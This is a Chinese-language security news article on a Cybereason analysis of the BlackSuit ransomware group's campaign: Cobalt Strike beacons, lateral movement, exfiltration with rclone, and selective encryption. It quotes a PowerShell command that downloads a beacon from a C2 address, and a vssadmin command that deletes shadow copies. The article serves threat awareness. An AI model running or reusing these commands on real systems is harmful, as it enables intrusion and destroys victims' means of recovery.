高度協(xié)同的破壞性勒索活動(dòng)

Cybereason最新調(diào)查揭露，BlackSuit勒索軟件組織（臭名昭著的Royal和Conti威脅組織的重組后繼者）正在實(shí)施一場(chǎng)高度協(xié)同的破壞性勒索活動(dòng)。該活動(dòng)融合了隱蔽性、速度和精準(zhǔn)打擊能力，堪稱今年最復(fù)雜的勒索軟件攻擊之一。

Cybereason在報(bào)告中指出："BlackSuit是2023年年中出現(xiàn)的勒索軟件組織，被廣泛認(rèn)為是Royal勒索團(tuán)伙的改頭換面或分支。"

三重殺傷鏈攻擊模式

與傳統(tǒng)僅關(guān)注加密的勒索攻擊不同，BlackSuit采用三階段殺傷鏈：初始入侵、數(shù)據(jù)竊取和選擇性加密，并輔以數(shù)據(jù)刪除手段破壞恢復(fù)工作。

攻擊始于部署Cobalt Strike信標(biāo)實(shí)現(xiàn)命令控制(C2)和橫向移動(dòng)。雖然初始入侵途徑尚不明確，但分析人員注意到早期流量來(lái)自未安裝Cybereason傳感器的設(shè)備，表明系統(tǒng)早已被攻陷。

研究團(tuán)隊(duì)強(qiáng)調(diào)："Cobalt Strike被確認(rèn)為BlackSuit勒索軟件的主要攻擊工具。"

橫向移動(dòng)技術(shù)組合

BlackSuit采用多種技術(shù)實(shí)現(xiàn)橫向移動(dòng)：

• 通過(guò)PsExec.exe在C:\Windows\Temp目錄分發(fā)執(zhí)行vm.dll和vm80.dll等載荷
• 創(chuàng)建具有System權(quán)限的RPC服務(wù)
• 使用Configure-SMRemoting.exe建立遠(yuǎn)程桌面連接
• 從網(wǎng)絡(luò)共享執(zhí)行frdke23.exe等可疑二進(jìn)制文件，通過(guò)rundll32.exe將代碼注入wuauclt.exe等合法進(jìn)程

這些技術(shù)使攻擊者能在全網(wǎng)進(jìn)行廣泛偵察和載荷部署的同時(shí)保持隱蔽性。

載荷投遞與執(zhí)行特征

攻擊者使用如下PowerShell命令下載Cobalt Strike信標(biāo)：

invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll

同一C2基礎(chǔ)設(shè)施被用于投遞最終載荷——通過(guò)重命名為b.exe和vmware.dll等文件部署B(yǎng)lackSuit勒索軟件。一個(gè)異常特征是執(zhí)行時(shí)使用了-nomutex標(biāo)志：

"與典型勒索行為不同...-nomutex標(biāo)志禁用互斥體創(chuàng)建...允許并發(fā)多實(shí)例執(zhí)行——可能是為了實(shí)現(xiàn)冗余、加速跨會(huì)話加密或規(guī)避基于互斥體的檢測(cè)。"

雙重勒索與破壞恢復(fù)

加密前，攻擊者使用偽裝成vmware.exe的rclone.exe竊取約60GB敏感數(shù)據(jù)。這反映了雙重勒索策略的流行趨勢(shì)——通過(guò)預(yù)先竊取數(shù)據(jù)增加贖金壓力。

為破壞系統(tǒng)恢復(fù)，攻擊者使用vssadmin.exe刪除卷影副本：

vssadmin delete shadows /all /quiet

隨后立即執(zhí)行勒索軟件，僅針對(duì)特定文件類型加密，同時(shí)排除Windows、IPC$和ADMIN$等系統(tǒng)關(guān)鍵文件夾以避免業(yè)務(wù)中斷。

精心設(shè)計(jì)的加密邏輯

BlackSuit的加密邏輯針對(duì)性能和隱蔽性進(jìn)行了優(yōu)化，避免加密.exe、.dll和.BlackSuit文件，并投放勒索說(shuō)明。